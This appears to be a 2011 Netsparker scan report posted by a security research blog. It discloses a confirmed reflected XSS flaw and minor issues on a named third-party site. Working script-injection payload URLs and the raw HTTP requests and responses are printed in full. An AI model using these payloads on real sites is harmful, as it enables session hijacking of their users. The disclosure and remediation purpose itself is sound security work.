XSS, Cross Site Scripting in www.hellonetwork.com, CWE-79, CAPEC-86, DORK, GHD REPORT SUMMARY

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog
Loading

Netsparker - Scan Report Summary
TARGET URL
http://www.hellonetwork.com/ypsearch.cfm?kw=c...
SCAN DATE
4/24/2011 3:06:40 PM
REPORT DATE
4/24/2011 3:13:25 PM
SCAN DURATION
00:02:09

Total Requests

276

Average Speed

2.13 req/sec.
4
identified
3
confirmed
0
critical
1
informational

GHDB, DORK Tests

GHDB, DORK Tests
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
25 %
LOW
50 %
INFORMATION
25 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/ypsearch.cfm kw GET Cross-site Scripting Yes
Internal Server Error Yes
Cookie Not Marked As HttpOnly Yes
IIS Version Disclosure No
Cross-site Scripting

Cross-site Scripting

1 TOTAL
IMPORTANT
CONFIRMED
1
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /ypsearch.cfm

/ypsearch.cfm CONFIRMED

http://www.hellonetwork.com/ypsearch.cfm?kw=%22%3E%3Cscript%3Ealert(9)%3C/script%3E&KID=29264

Parameters

Parameter Type Value
kw GET "><script>alert(9)</script>
KID GET 29264

Request

GET /ypsearch.cfm?kw=%22%3E%3Cscript%3Enetsparker(9)%3C/script%3E&KID=29264 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.hellonetwork.com
Cookie: IPCITYNAME=Dallas; IPCITYSTATE=TX; IPCITYZIP=75207; SEARCHKEYWORD=%27%3E%3Cscript%3Enetsparker%289%29%3C%2Fscript%3E; AFSCHANNEL=3788747813
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: SEARCHKEYWORD=%22%3E%3Cscript%3Enetsparker%289%29%3C%2Fscript%3E;path=/
Date: Sun, 24 Apr 2011 20:07:42 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml">
<head>


<script type="text/javascript">
window.google_analytics_uacct = "UA-350746-14";
</script>

<title>"><script>netsparker(9)</script> in Dallas, TX Local Search Results</title>



<script src="http://www.google.com/jsapi"> </script>
<script type="text/javascript" charset="utf-8">
google.load('ads.search', '2');
google.load('jquery', '1.4');
</script>

<script type="text/javascript">

jQuery(function( $ ){
var isOverGoogleAd = false;
$( "iframe[ id *= google ]" )
.mouseover(
function(){
isOverGoogleAd = true;
}
)
.mouseout(
function(){
isOverGoogleAd = false;
}
)
;
$( window ).blur(
function(){
if (isOverGoogleAd){
$('#asftrack').html('<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1053332784/?value=1.0&amp;label=2uiYCKyIpAIQsKqi9gM&amp;guid=ON&amp;script=0"/>');
}
}
)
.focus();
});

</script>


<script language="JavaScript" type="text/javascript">
function beenClicked(marker) {
var theImage = document.getElementById('converter');
theImage.src = marker;
}
function altBeenClicked(marker) {
var theImage = document.getElementById('altconverter');
theImage.src = marker;
}
function altBeenClickedTwo(marker) {
var theImage = document.getElementById('altconvertertwo');
theImage.src = marker;
}
function trackit() {
var objFrame=document.getElementById("placeholder");
objFrame.src="/click.html";
}

function trackrbl() {
pageTracker._trackPageview('/track/rbl/');
}

function trackquigo() {
pageTracker._trackPageview('/track/quigo/');
var theImage = document.getElementById('converter');
theImage.src = "https://mv.bidsystem.com/ppc/sendtracker.aspx?c=208596&conversion=1&w=p3p&cb=5B3F6608-0DC3-D441-BEABB4C163958C34&u=c22f0e8e-f312-43e6-994c-526c659b5b6d";
}

function trackrl() {
pageTracker._trackPageview('/track/rl/');
beenClicked('http://www.googleadservices.com/pagead/conversion/1071721528/?label=2omWCKGgPxC42IT_Aw&script=0');
}

function ct(c,s,t,r,p) {
var ctrackFrame=document.getElementById("ctrack");
ctrackFrame.src="/t.cfm?c=" + c + "&s=" + s + "&t=" + t + "&r=" + r + "&p=" + p;

}

var cc = 0;
function cti(c,s,t,r,p,k) {
pageTracker._trackPageview('/vz/track');
var ctrackFrame=document.getElementById("ctrack");
ctrackFrame.src="/ti.cfm?c=" + c + "&s=" + s + "&t=" + t + "&r=" + r + "&p=" + p + "&k=" + k;
//cc = cc + 1;
//if (cc == 1) {
// $('.verizon_block').hide();
//}
}

function itrack() {

}

function sponsored_tracking_112() {

}

/* JavaScript for click tracking verizon */

function ctv(c,s,t,r,p,k,a) {
pageTracker._trackPageview('/idearc');
$('#cBlock').load("/tv.cfm?c=" + c + "&s=" + s + "&t=" + t + "&r=" + r + "&p=" + p + "&k=" + k + "&a=" + escape(a.href));
var theImage = document.getElementById('converter');
theImage.src = 'http://www.googleadservices.com/pagead/conversion/1071721528/?label=gGSYCN2gPxC42IT_Aw&script=0';
}
function ctvp(c,s,t,r,p,k,a) {
pageTracker._trackPageview('/idearc');
}



function doPhoneLink(clickUrl, suffix) {
var rtn = true;
if(showObject('phoneLabel'+suffix)) {
rtn = false;
hideObject('phoneLink'+suffix);
showObject('phoneLabel'+suffix);
if(clickUrl) {
logClick(clickUrl);
}
}
return rtn;
}

function doEmailLink(clickUrl, suffix) {
var rtn = true;
if(showObject('emailLabel'+suffix)) {
rtn = false;
hideObject('emailLink'+suffix);
showObject('emailLabel'+suffix);
if(clickUrl) {
logClick(clickUrl);
}
}
return rtn;
}

function getObject(objID) {
if (document.all) {
var obj = document.all[objID];
} else if (document.getElementById) {
var obj = document.getElementById(objID);
}
return obj;
}

function hideObject(objID) {
var obj = getObject(objID);
var rtn = false;
if (obj != null) {
obj.style.display = "none";
rtn = true;
}
return rtn;
}

function showObject(objID) {
var obj = getObject(objID);
var rtn = false;
if (obj != null) {
obj.style.display = "inline";
rtn = true;
}
return rtn;
}

function logClick(clickUrl) {
var img = new Image();
img.src = clickUrl;
}

</script>

<script type="text/javascript" src="/scripts/SICtree/ajax.js"></script><script type="text/javascript" src="/ajax/getAd.js"></script>

<script type="text/javascript" src="/scripts/ufo.js"></script>
<script type="text/javascript" src="/scripts/swfobject.js"></script>

<link href="/inc/css/styles.css" rel="stylesheet" type="text/css" media="all">

<style type="text/css" media="screen">
@import url(/styles/base.css);
</style>
<style type="text/css" media="screen">
@import url(/styles/headerNav.css);
</style>
<style type="text/css" media="screen">
@import url(/css/default.css);
</style>
<style type="text/css" media="print">
@import url(/styles/printStyle.css);
</style>
<style type="text/css" media="screen">
@import url(/styles/nav.css);
</style>
<style type="text/css">

</style>
<script src="/scripts/standard_ui.js" type="text/javascript" language="javascript"></script>
<link rel="SHORTCUT ICON" href="/favicon.ico">

<script type="text/javascript">
window.google_analytics_uacct = "UA-350746-16";
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAxlNjcILiMUNra09cJ_A5shTJTasaZLGu-S0MxpFJaRF7NywsZRSBRU3tj6CuxjTTjBB8JFKkUFVXXA" type="text/javascript"></script>




<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
<script type="text/javascript">
GS_googleAddAdSenseService("ca-pub-8011115638404408");
GS_googleEnableAllServices();
</script>
<script type="text/javascript">
GA_googleAddAttr("Domain", "hellolocal");
GA_googleAddAttr("Keyword", "scriptnetsparker9script");
</script>
<script type="text/javascript">

GA_googleAddSlot("ca-pub-8011115638404408", "hellonetwork_header");

GA_googleAddSlot("ca-pub-8011115638404408", "hellonetwork_search_bottom_left");

</script>
<script type="text/javascript">
GA_googleFetchAds();
</script>

</head>

<body style="background-color: #727BAC; margin-top: 0px; padding-top: 0px;" onload="" onunload="">
<div id="wrapper">

<a name="top"></a>

<div id="bodyContent">

<table cellspacing="0" cellpadding="0" border="0" width="950" style="margin-left: auto; margin-right: auto; postion: relative;">

<tr>
<td valign="top" width="100%" colspan="3">
<!-- Begin Header -->
<table cellpadding="0" cellspacing="0">
<tr>
<td id="tlHead">
<div id="headFlashBlock" style="width: 350px; height: 85px; z-index: 0;"><div style="width: 500px; height: 85px; background-image: url(/images/backup_logo.png); background-repeat: no-repeat;"></div></div>
</td>
<td id="trHead" style="width: 598px; text-align: right; padding-right: 10px;">
<table style="float:right">
<tr>
<td>&nbsp;

<script type="text/javascript">
GA_googleFillSlot("hellonetwork_header");
</script>

</td>
</tr>
</table>
</td>
</tr>

<tr>
<td colspan="2" style="background-color: white; padding-left: 9px; border-right: solid 1px green;">
<ul id="nav">
<li class="mainNav"><a class="mainNav" href="/index.cfm">Home</a>
</li>
<li class="mainNav"><a class="mainNav" href="/neighborhoods.cfm">Neighborhoods</a></li>
<li class="mainNav"><a class="mainNav" href="/zipcodes.cfm">ZIP Codes</a></li>
</ul>
</td>
</tr>

</table>

<script type="text/javascript">
var headLogo = { movie:"/flash/HelloLocalLogoFade_nl.swf?varCityName=Network&EndofCity=26", width:"350", height:"85", majorversion:"6", build:"40", wmode:"transparent" };
UFO.create(headLogo, "headFlashBlock");
</script>

<!-- End Header -->
</td>
</tr>
<tr>
<td colspan="3" valign="top">
<div style="background-color: white; border-left: solid 2px #313260; border-right: solid 2px #313260; position: relative; height: 15px; width: 946px; background-image: url(/styles/images/header/underNavShadow.jpg); background-repeat: repeat-x;"><br />
</div>
<table border="0" cellspacing="0" cellpadding="0" width="100%" id="contentTable" summary="">
<tr>
<td rowspan="4" id="leftBg"></td>
<td valign="top" id="mainContent">



<div style="padding-left:10px;">
<h1 style="text-transform: capitalize;">"><script>netsparker(9)</script> listings in Dallas, Texas</h1>
<h2 style="text-transform: capitalize;">Use the map to find the closest "><script>netsparker(9)</script> listings near you</h2>
</div>



<script type="text/javascript" charset="utf-8">
var pageOptions = {
'pubId' : 'pub-8011115638404408',
'query' : '"><script>netsparker(9)</script>',
'channel' : '3788747813',
'hl' : 'en'
};

var adblock1 = {
'container' : 'adblock1',
'width' : 'auto',
'lines' : '3',
'number' : '4',
'fontFamily' : 'arial',
'fontSizeTitle' : '16px',
'fontSizeDescription' : '12px',
'fontSizeDomainLink' : '12px',
'colorTitleLink' : '#0B0B8F',
'colorText' : '#000000',
'colorDomainLink' : '#0B0B8F'
};

var adblock2 = {
'container' : 'adblock2',
'width' : 'auto',
'lines' : '3',
'number' : '5',
'fontFamily' : 'arial',
'fontSizeTitle' : '16px',
'fontSizeDescription' : '12px',
'fontSizeDomainLink' : '12px',
'colorTitleLink' : '#FF5C00',
'colorText' : '#000000',
'colorDomainLink' : '#000000'
};

new google.ads.search.Ads(pageOptions, adblock1, adblock2);
</script>



<style type="text/css">
.sponsored_listing .name {
font-weight: bold;
color: blue;
text-decoration: underline;
}
.sponsored_listing .teaser {
color: black;
text-decoration: none;
}
.sponsored_listing .website_link {
color: green;
font-size: 11px;
}
.sponsored_listing {
padding-bottom: 10px;
margin-bottom: 10px;
border-bottom: solid 1px gray;
}
</style>
<table width="935">
<tr>
<td colspan="3">
<div class="searchBox" style="margin-left: 5px; height: 50px; background-color: #2E841F; background-image: url(/images/search_bg.png);"> <form name="ypsearch" id="ypsearch" action="/local_yellow_page_search.cfm" method="GET" style="font-size: 21px; font-weight: bold;"> <table style="margin-top: 12px; margin-left: 10px;"> <tr> <td> <span class="mainSearch">Find</span> <input name="kw" id="kw" type="text" value=""><script>netsparker(9)</script>" style="padding-left: 5px; width: 200px; height: 16px; font-size: 14px; font-weight: bold; text-transform: Capitalize;" /> <span class="mainSearch">Near</span> <input name="location" id="location" type="text" value="Dallas, TX" style="padding-left: 5px; width: 200px; height: 16px; font-size: 14px; font-weight: bold; text-transform: Capitalize;" /> <input type="hidden" id="tt" name="tt" value="hlgpage" /> </td> <td style="padding-left: 10px;"> <input type="submit" value="Search Local" /> </td> </tr> </table> </form> </div>
</td>
</tr>
<tr>
<td width="220">


<div style="padding-left: 5px;">



<div class="filterBoxClone" style="background-color: #EDF5FF;">

</div>

<div class="filterBoxClone">
<div style="font-size: 11px;"><h2>Local Reviews</h2>
</div>

<br clear="all" />
<div style="text-align: center;">

<script type="text/javascript">
GA_googleFillSlot("hellonetwork_search_bottom_left");
</script>

</div>

<br clear="all" />



</div>




</td>
<td width="415">
<div style="padding: 0 15px 0px 15px;">
<div style="padding: 0 20px 20px 20px;">



<style type="text/css">
a:link,.w,a.w:link,.w a:link(line 1)
{
font-weight: bold;
}
</style>

<div style="text-align: center;"><div id="adblock1"></div>

</div>



<style type="text/css">
div.filterBox {
text-align: left;
padding: 5px;
border: solid 1px #0C0D3B;
margin-bottom: 5px;
}
div.filterBox h2 {
margin-top: 0px;
font-size: 12px;
font-weight: bold;
border-bottom: solid 1px #CCCCCC;
}
div.filterBox div {
padding-left: 15px;
padding-bottom: 5px;
}
a.listingBlockS, a.listingBlockS:link,a.listingBlockS:active,a.listingBlockS:visited {
display: block;
position: relative;
padding: 5px 0 5px 0;
margin: 5px 0 5px 0;
border: solid 1px gray;
padding: 5px;
color: black;
background-color: #EDF5FF;
}
a.listingBlockS:hover {
background-color: #F7F274;
color: #00008A;
}
a.listingBlockS span {
color: #00008A;
}

.listingBlock {
display: block;
position: relative;
padding: 5px 0 5px 0;
margin: 5px 0 5px 0;
padding: 5px;
border-bottom: solid 1px gray;
}

span.listingTitle, a.listingTitle {
font-weight: normal;
font-size: 12px;
text-decoration: underline;
}
a.pageCurrent, a.pageCurrent:active, a.pageCurrent:visited {
border: solid 1px #0C0D3B;
padding: 2px;
color: white;
background-color: #0C0D3B;
font-size: 12px;
..
Internal Server Error

Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /ypsearch.cfm

/ypsearch.cfm CONFIRMED

http://www.hellonetwork.com/ypsearch.cfm?kw=credit%20monitoring&KID=29264%00%27%22--%3E%3C%2Fstyle%3..

Request

GET /ypsearch.cfm?kw=credit%20monitoring&KID=29264%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000017)%3C%2Fscript%3E HTTP/1.1
Referer: http://www.hellonetwork.com/ypsearch.cfm?kw=credit%20monitoring&KID=29264%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000017)%3C%2Fscript%3E
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.hellonetwork.com
Cookie: IPCITYNAME=Dallas; IPCITYSTATE=TX; IPCITYZIP=75207; SEARCHKEYWORD=credit%20monitoring; AFSCHANNEL=3788747813
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Transfer-Encoding: chunked
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Date: Sun, 24 Apr 2011 20:08:13 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>500 - Internal server error.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>500 - Internal server error.</h2>
<h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3>
</fieldset></div>
</div>
</body>
</html>
<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></CODE></COMMENT></DEL></DFN></DIR></DIV></DL></EM></FIG></FN></FONT></FORM></FRAME></FRAMESET></H1></H2></H3></H4></H5></H6></HEAD></I></INS></KBD></LISTING></MAP></MARQUEE></MENU></MULTICOL></NOBR></NOFRAMES></NOSCRIPT></NOTE></OL></P></PARAM></PERSON></PLAINTEXT></PRE></Q></S></SAMP></SCRIPT></SELECT></SMALL></STRIKE></STRONG></SUB></SUP></TABLE></TD></TEXTAREA></TH></TITLE></TR></TT></U></UL></VAR></WBR></XMP>

<font face="arial"></font>



<html>
<head>
<title>Error Occurred While Processing Request</title>


<script language="JavaScript">
function showHide(targetName) {
if( document.getElementById ) { // NS6+
target = document.getElementById(targetName);
} else if( document.all ) { // IE4+
target = document.all[targetName];
}

if( target ) {
if( target.style.display == "none" ) {
target.style.display = "inline";
} else {
target.style.display = "none";
}
}
}
</script>


</head>
<body>

<font style="COLOR: black; FONT: 16pt/18pt verdana">
The web site you are accessing has experienced an unexpected error.<br>
Please contact the website administrator.

</font>
<br><br>
<table border="1" cellpadding="3" bordercolor="#000808" bgcolor="#e7e7e7">
<tr>
<td bgcolor="#000066">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
The following information is meant for the website developer for debugging purposes.
</font>
</td>
<tr>
<tr>
<td bgcolor="#4646EE">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
Error Occurred While Processing Request
</font>
</td>
</tr>
<tr>
<td>
<font style="COLOR: black; FONT: 8pt/11pt verdana">


<table width="500" cellpadding="0" cellspacing="0" border="0">
<tr>
<td id="tableProps2" align="left" valign="middle" width="500">
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 29264 '"--></style></script><InvalidTag>netsparker(0x000017)</script> for CFSQLTYPE CF_SQL_INTEGER.
</h1>
</td>
</tr>
<tr>
<td id="tablePropsWidth" width="400" colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">

</font>
</td>
</tr>
<tr>
<td height>&nbsp;</td>
</tr>


<tr><td>

<table border="0" cellpadding="0" cellspacing="0">

</table>
</td></tr>

<tr>
<td colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Resources:
<ul>

<li>Enable Robust Exception Information to provide greater detail about the source of errors. In the Administrator, click Debugging & Logging > Debug Output Settings, and select the Robust Exception Information option.</li>

<li>Check the <a href='http://www.adobe.com/go/prod_doc' target="new">ColdFusion documentation</a> to verify that you are using the correct syntax.</li>
<li>Search the <a href='http://www.adobe.com/go/prod_support/' target="new">Knowledge Base</a> to find a solution to your problem.</li>

</ul>
<p>
</td>
</tr>

<tr>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Browser&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Remote Address&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">173.193.214.243</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Referrer&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">http://www.hellonetwork.com/ypsearch.cfm?kw=credit%20monitoring&amp;KID=29264%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000017)%3C%2Fscript%3E</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Date/Time&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">24-Apr-11 04:08 PM</td>
</tr>
</table>
</td>
</tr>
</table>


</font>
</td>
</tr>
</table>
</body></html>


Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /ypsearch.cfm

/ypsearch.cfm CONFIRMED

http://www.hellonetwork.com/ypsearch.cfm?kw=credit%20monitoring&KID=29264

Identified Cookie

IPCITYNAME

Request

GET /ypsearch.cfm?kw=credit%20monitoring&KID=29264 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.hellonetwork.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: IPCITYNAME=Dallas;expires=Tue, 16-Apr-2041 20:06:11 GMT;path=/,IPCITYSTATE=TX;expires=Tue, 16-Apr-2041 20:06:11 GMT;path=/,IPCITYZIP=75207;expires=Tue, 16-Apr-2041 20:06:11 GMT;path=/,SEARCHKEYWORD=credit%20monitoring;path=/,AFSCHANNEL=3788747813;path=/
Date: Sun, 24 Apr 2011 20:06:10 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml">
<head>


<script type="text/javascript">
window.google_analytics_uacct = "UA-350746-14";
</script>

<title>credit monitoring in Dallas, TX Local Search Results</title>



<script src="http://www.google.com/jsapi"> </script>
<script type="text/javascript" charset="utf-8">
google.load('ads.search', '2');
google.load('jquery', '1.4');
</script>

<script type="text/javascript">

jQuery(function( $ ){
var isOverGoogleAd = false;
$( "iframe[ id *= google ]" )
.mouseover(
function(){
isOverGoogleAd = true;
}
)
.mouseout(
function(){
isOverGoogleAd = false;
}
)
;
$( window ).blur(
function(){
if (isOverGoogleAd){
$('#asftrack').html('<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1053332784/?value=1.0&amp;label=2uiYCKyIpAIQsKqi9gM&amp;guid=ON&amp;script=0"/>');
}
}
)
.focus();
});

</script>


<script language="JavaScript" type="text/javascript">
function beenClicked(marker) {
var theImage = document.getElementById('converter');
theImage.src = marker;
}
function altBeenClicked(marker) {
var theImage = document.getElementById('altconverter');
theImage.src = marker;
}
function altBeenClickedTwo(marker) {
var theImage = document.getElementById('altconvertertwo');
theImage.src = marker;
}
function trackit() {
var objFrame=document.getElementById("placeholder");
objFrame.src="/click.html";
}

function trackrbl() {
pageTracker._trackPageview('/track/rbl/');
}

function trackquigo() {
pageTracker._trackPageview('/track/quigo/');
var theImage = document.getElementById('converter');
theImage.src = "https://mv.bidsystem.com/ppc/sendtracker.aspx?c=208596&conversion=1&w=p3p&cb=5B316145-AFD6-83CF-4A0890CD085BC52E&u=c22f0e8e-f312-43e6-994c-526c659b5b6d";
}

function trackrl() {
pageTracker._trackPageview('/track/rl/');
beenClicked('http://www.googleadservices.com/pagead/conversion/1071721528/?label=2omWCKGgPxC42IT_Aw&script=0');
}

function ct(c,s,t,r,p) {
var ctrackFrame=document.getElementById("ctrack");
ctrackFrame.src="/t.cfm?c=" + c + "&s=" + s + "&t=" + t + "&r=" + r + "&p=" + p;

}

var cc = 0;
function cti(c,s,t,r,p,k) {
pageTracker._trackPageview('/vz/track');
var ctrackFrame=document.getElementById("ctrack");
ctrackFrame.src="/ti.cfm?c=" + c + "&s=" + s + "&t=" + t + "&r=" + r + "&p=" + p + "&k=" + k;
//cc = cc + 1;
//if (cc == 1) {
// $('.verizon_block').hide();
//}
}

function itrack() {

}

function sponsored_tracking_112() {

}

/* JavaScript for click tracking verizon */

function ctv(c,s,t,r,p,k,a) {
pageTracker._trackPageview('/idearc');
$('#cBlock').load("/tv.cfm?c=" + c + "&s=" + s + "&t=" + t + "&r=" + r + "&p=" + p + "&k=" + k + "&a=" + escape(a.href));
var theImage = document.getElementById('converter');
theImage.src = 'http://www.googleadservices.com/pagead/conversion/1071721528/?label=gGSYCN2gPxC42IT_Aw&script=0';
}
function ctvp(c,s,t,r,p,k,a) {
pageTracker._trackPageview('/idearc');
}



function doPhoneLink(clickUrl, suffix) {
var rtn = true;
if(showObject('phoneLabel'+suffix)) {
rtn = false;
hideObject('phoneLink'+suffix);
showObject('phoneLabel'+suffix);
if(clickUrl) {
logClick(clickUrl);
}
}
return rtn;
}

function doEmailLink(clickUrl, suffix) {
var rtn = true;
if(showObject('emailLabel'+suffix)) {
rtn = false;
hideObject('emailLink'+suffix);
showObject('emailLabel'+suffix);
if(clickUrl) {
logClick(clickUrl);
}
}
return rtn;
}

function getObject(objID) {
if (document.all) {
var obj = document.all[objID];
} else if (document.getElementById) {
var obj = document.getElementById(objID);
}
return obj;
}

function hideObject(objID) {
var obj = getObject(objID);
var rtn = false;
if (obj != null) {
obj.style.display = "none";
rtn = true;
}
return rtn;
}

function showObject(objID) {
var obj = getObject(objID);
var rtn = false;
if (obj != null) {
obj.style.display = "inline";
rtn = true;
}
return rtn;
}

function logClick(clickUrl) {
var img = new Image();
img.src = clickUrl;
}

</script>

<script type="text/javascript" src="/scripts/SICtree/ajax.js"></script><script type="text/javascript" src="/ajax/getAd.js"></script>

<script type="text/javascript" src="/scripts/ufo.js"></script>
<script type="text/javascript" src="/scripts/swfobject.js"></script>

<link href="/inc/css/styles.css" rel="stylesheet" type="text/css" media="all">

<style type="text/css" media="screen">
@import url(/styles/base.css);
</style>
<style type="text/css" media="screen">
@import url(/styles/headerNav.css);
</style>
<style type="text/css" media="screen">
@import url(/css/default.css);
</style>
<style type="text/css" media="print">
@import url(/styles/printStyle.css);
</style>
<style type="text/css" media="screen">
@import url(/styles/nav.css);
</style>
<style type="text/css">

</style>
<script src="/scripts/standard_ui.js" type="text/javascript" language="javascript"></script>
<link rel="SHORTCUT ICON" href="/favicon.ico">

<script type="text/javascript">
window.google_analytics_uacct = "UA-350746-16";
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAxlNjcILiMUNra09cJ_A5shTJTasaZLGu-S0MxpFJaRF7NywsZRSBRU3tj6CuxjTTjBB8JFKkUFVXXA" type="text/javascript"></script>




<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
<script type="text/javascript">
GS_googleAddAdSenseService("ca-pub-8011115638404408");
GS_googleEnableAllServices();
</script>
<script type="text/javascript">
GA_googleAddAttr("Domain", "hellolocal");
GA_googleAddAttr("Keyword", "credit_monitoring");
</script>
<script type="text/javascript">

GA_googleAddSlot("ca-pub-8011115638404408", "hellonetwork_header");

GA_googleAddSlot("ca-pub-8011115638404408", "hellonetwork_search_bottom_left");

</script>
<script type="text/javascript">
GA_googleFetchAds();
</script>

</head>

<body style="background-color: #727BAC; margin-top: 0px; padding-top: 0px;" onload="" onunload="">
<div id="wrapper">

<a name="top"></a>

<div id="bodyContent">

